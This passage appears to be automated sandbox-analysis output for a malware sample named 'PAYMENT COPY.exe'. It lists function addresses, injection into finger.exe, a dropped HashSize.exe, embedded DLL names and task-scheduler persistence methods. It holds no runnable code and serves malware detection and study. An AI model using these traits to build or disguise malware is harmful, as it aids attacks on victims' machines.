                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_056327A00_2_056327A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_056327260_2_05632726
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_064FFAC00_2_064FFAC0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_064FF7C80_2_064FF7C8
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_064E00400_2_064E0040
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_064E00060_2_064E0006
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00418C731_2_00418C73
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_004014F01_2_004014F0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_004030F01_2_004030F0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_004012001_2_00401200
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_004104131_2_00410413
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_004044F71_2_004044F7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0042F4A31_2_0042F4A3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_004025601_2_00402560
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0040E6431_2_0040E643
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_004106331_2_00410633
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00416E831_2_00416E83
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0040E7901_2_0040E790
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0040E7931_2_0040E793
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107A1181_2_0107A118
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010681581_2_01068158
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A01AA1_2_010A01AA
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A21AE1_2_010A21AE
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010941A21_2_010941A2
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010981CC1_2_010981CC
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010720001_2_01072000
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD01001_2_00FD0100
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109A3521_2_0109A352
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A03E61_2_010A03E6
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FEE3F01_2_00FEE3F0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010602C01_2_010602C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A05911_2_010A0591
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010844201_2_01084420
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010924461_2_01092446
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE05351_2_00FE0535
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0108E4F61_2_0108E4F6
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFC6E01_2_00FFC6E0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010047501_2_01004750
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDC7C01_2_00FDC7C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE07701_2_00FE0770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FC68B81_2_00FC68B8
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FEA8401_2_00FEA840
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A01_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF69621_2_00FF6962
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E8F01_2_0100E8F0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109AB401_2_0109AB40
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDEA801_2_00FDEA80
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109EB891_2_0109EB89
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01096BD71_2_01096BD7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD0CF21_2_00FD0CF2
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107CD1F1_2_0107CD1F
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0C001_2_00FE0C00
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDADE01_2_00FDADE0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE8DC01_2_00FE8DC0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF8DBF1_2_00FF8DBF
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FEAD001_2_00FEAD00
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01022F281_2_01022F28
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01000F301_2_01000F30
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01082F301_2_01082F30
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01054F401_2_01054F40
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF2E901_2_00FF2E90
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105EFA01_2_0105EFA0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109EE261_2_0109EE26
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD2FC81_2_00FD2FC8
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109CE931_2_0109CE93
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109EEDB1_2_0109EEDB
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010AB16B1_2_010AB16B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0101516C1_2_0101516C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FEB1B01_2_00FEB1B0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCF1721_2_00FCF172
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0108F0CC1_2_0108F0CC
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010970E91_2_010970E9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109F0E01_2_0109F0E0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFD2F01_2_00FFD2F0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109132D1_2_0109132D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFB2C01_2_00FFB2C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE52A01_2_00FE52A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCD34C1_2_00FCD34C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010812ED1_2_010812ED
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010975711_2_01097571
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD14601_2_00FD1460
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107D5B01_2_0107D5B0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109F43F1_2_0109F43F
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109F7B01_2_0109F7B0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD17EC1_2_00FD17EC
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010256301_2_01025630
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010916CC1_2_010916CC
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010759101_2_01075910
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE38E01_2_00FE38E0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104D8001_2_0104D800
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE59901_2_00FE5990
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE99501_2_00FE9950
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFB9501_2_00FFB950
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109FB761_2_0109FB76
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01055BF01_2_01055BF0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0101DBF91_2_0101DBF9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109FA491_2_0109FA49
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01097A461_2_01097A46
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01053A6C1_2_01053A6C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFFB801_2_00FFFB80
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107DAAC1_2_0107DAAC
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01081AA31_2_01081AA3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0108DAC61_2_0108DAC6
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01091D5A1_2_01091D5A
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01097D731_2_01097D73
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01059C321_2_01059C32
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFFDC01_2_00FFFDC0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109FCF21_2_0109FCF2
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109FF091_2_0109FF09
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE9EB01_2_00FE9EB0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109FFB11_2_0109FFB1
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FA3FD21_2_00FA3FD2
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FA3FD51_2_00FA3FD5
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE1F921_2_00FE1F92
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_036459763_2_03645976
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_036459733_2_03645973
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_0364E0663_2_0364E066
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_036458263_2_03645826
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_036478163_2_03647816
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_0363B73D3_2_0363B73D
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_0364FE4D3_2_0364FE4D
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_0363B6DA3_2_0363B6DA
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_036666863_2_03666686
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_036475F63_2_036475F6
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0366A3524_2_0366A352
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_036703E64_2_036703E6
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035BE3F04_2_035BE3F0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_036302C04_2_036302C0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_036381584_2_03638158
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035A01004_2_035A0100
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0364A1184_2_0364A118
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_036681CC4_2_036681CC
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_036641A24_2_036641A2
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_036721AE4_2_036721AE
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_036701AA4_2_036701AA
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_036420004_2_03642000
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035D47504_2_035D4750
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035B07704_2_035B0770
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035AC7C04_2_035AC7C0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035CC6E04_2_035CC6E0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035B05354_2_035B0535
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_036705914_2_03670591
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_036624464_2_03662446
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_036544204_2_03654420
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0365E4F64_2_0365E4F6
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0366AB404_2_0366AB40
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_03666BD74_2_03666BD7
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0366EB894_2_0366EB89
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035AEA804_2_035AEA80
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035C69624_2_035C6962
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035B29A04_2_035B29A0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035BA8404_2_035BA840
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035DE8F04_2_035DE8F0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035968B84_2_035968B8
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_03624F404_2_03624F40
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_03652F304_2_03652F30
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035D0F304_2_035D0F30
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035F2F284_2_035F2F28
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035A2FC84_2_035A2FC8
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0362EFA04_2_0362EFA0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0366EE264_2_0366EE26
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0366EEDB4_2_0366EEDB
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035C2E904_2_035C2E90
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0366CE934_2_0366CE93
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035BAD004_2_035BAD00
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0364CD1F4_2_0364CD1F
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035B8DC04_2_035B8DC0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035AADE04_2_035AADE0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035C8DBF4_2_035C8DBF
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035B0C004_2_035B0C00
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035A0CF24_2_035A0CF2
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0359D34C4_2_0359D34C
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0366132D4_2_0366132D
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_036512ED4_2_036512ED
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035CB2C04_2_035CB2C0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035CD2F04_2_035CD2F0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035B52A04_2_035B52A0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0367B16B4_2_0367B16B
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0359F1724_2_0359F172
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035E516C4_2_035E516C
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035BB1B04_2_035BB1B0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0366F0E04_2_0366F0E0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_036670E94_2_036670E9
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0365F0CC4_2_0365F0CC
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035A17EC4_2_035A17EC
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0366F7B04_2_0366F7B0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035F56304_2_035F5630
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_036616CC4_2_036616CC
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_036675714_2_03667571
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_036795C34_2_036795C3
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0364D5B04_2_0364D5B0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035A14604_2_035A1460
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0366F43F4_2_0366F43F
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0366FB764_2_0366FB76
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_03625BF04_2_03625BF0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035EDBF94_2_035EDBF9
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035CFB804_2_035CFB80
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_03623A6C4_2_03623A6C
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_03667A464_2_03667A46
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0366FA494_2_0366FA49
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0365DAC64_2_0365DAC6
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_03651AA34_2_03651AA3
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0364DAAC4_2_0364DAAC
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035B99504_2_035B9950
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035CB9504_2_035CB950
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_036459104_2_03645910
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035B59904_2_035B5990
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0361D8004_2_0361D800
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035B38E04_2_035B38E0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0366FF094_2_0366FF09
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035B1F924_2_035B1F92
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0366FFB14_2_0366FFB1
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035B9EB04_2_035B9EB0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_03667D734_2_03667D73
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_03661D5A4_2_03661D5A
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035CFDC04_2_035CFDC0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_03629C324_2_03629C32
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0366FCF24_2_0366FCF2
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_02BB22304_2_02BB2230
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_02BCC1304_2_02BCC130
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_02BAB2D04_2_02BAB2D0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_02BAD2C04_2_02BAD2C0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_02BAD0A04_2_02BAD0A0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_02BA11E74_2_02BA11E7
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_02BAB4204_2_02BAB420
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_02BAB41D4_2_02BAB41D
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_02BB3B104_2_02BB3B10
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_02BB59004_2_02BB5900
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_033AE3544_2_033AE354
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_033AE4734_2_033AE473
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_033B546C4_2_033B546C
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_033ACB784_2_033ACB78
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_033AE80C4_2_033AE80C
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_033AD8D84_2_033AD8D8
                      Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 035E5130 appears 53 times
                      Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 0362F290 appears 98 times
                      Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 035F7E54 appears 102 times
                      Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 0359B970 appears 210 times
                      Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 0361EA12 appears 76 times
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: String function: 00FCB970 appears 210 times
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: String function: 0104EA12 appears 76 times
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: String function: 0105F290 appears 98 times
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: String function: 01015130 appears 53 times
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: String function: 01027E54 appears 94 times
                      Source: PAYMENT COPY.exe, 00000000.00000002.1054440794.0000000005D60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PAYMENT COPY.exe
                      Source: PAYMENT COPY.exe, 00000000.00000002.1054326763.0000000005D10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs PAYMENT COPY.exe
                      Source: PAYMENT COPY.exe, 00000000.00000002.1027023009.000000000084E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PAYMENT COPY.exe
                      Source: PAYMENT COPY.exe, 00000000.00000002.1052268046.00000000057A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDigfuwmfm.dll" vs PAYMENT COPY.exe
                      Source: PAYMENT COPY.exe, 00000000.00000002.1027702847.00000000029CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs PAYMENT COPY.exe
                      Source: PAYMENT COPY.exe, 00000001.00000002.1159408870.00000000010CD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PAYMENT COPY.exe
                      Source: PAYMENT COPY.exe, 00000001.00000002.1159114036.0000000000B48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefinger.exej% vs PAYMENT COPY.exe
                      Source: PAYMENT COPY.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: PAYMENT COPY.exe, SegmentedMap.csCryptographic APIs: 'CreateDecryptor'
                      Source: HashSize.exe.0.dr, SegmentedMap.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.PAYMENT COPY.exe.3c23fd0.0.raw.unpack, SegmentedMap.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                      Source: 6.2.HashSize.exe.3b29400.3.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 6.2.HashSize.exe.3b29400.3.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 6.2.HashSize.exe.3b29400.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 6.2.HashSize.exe.3b29400.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 6.2.HashSize.exe.3b29400.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 6.2.HashSize.exe.3b29400.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
